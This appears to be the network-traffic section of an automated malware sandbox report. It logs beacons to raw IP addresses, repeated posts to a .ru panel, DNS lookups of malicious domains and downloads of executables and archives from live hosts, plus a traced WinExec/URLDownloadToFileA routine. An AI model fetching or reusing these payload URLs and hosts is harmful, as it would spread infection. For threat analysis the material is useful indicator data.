Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mbcyqmttpiinpghx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eyqxnblygic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://elpsnjvbyqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xnmfeyqpwnehurxh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eeycidiyfjvuwaep.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qmbakktwarjac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://feltxgyoedldtlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtlgosscvcry.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: gebeus.ru
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkqgdawiidcayk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mmcxxioyukngeefd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://coiniqplnikp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sijoltnxjfxqjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uwqwnifeydwej.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpenaelwjof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: gebeus.ru
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tfqtvoxxlfyfid.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mhvibsdewxn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://akvufandfxiqflw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bqhvneiiyelqwiyv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oqgvummtqov.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vxvnjhhjwdcwv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wagishcpburncp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rhafqfudulgf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 345Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bmucdlsvjvamj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ebgowpcalmic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kguhhqwlowh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: gebeus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ajhanernmeqt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: gebeus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: unknown	TCP traffic detected without corresponding DNS query: 64.190.113.113

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Code function: 5_2_00BA1099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

5_2_00BA1099

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113

Source: global traffic	DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic	DNS traffic detected: DNS query: evilos.cc
Source: global traffic	DNS traffic detected: DNS query: gebeus.ru
Source: global traffic	DNS traffic detected: DNS query: mussangroup.com
Source: global traffic	DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic	DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic	DNS traffic detected: DNS query: rentry.co
Source: global traffic	DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic	DNS traffic detected: DNS query: liernessfornicsa.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7627

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 eb Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 24 Jul 2024 17:55:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 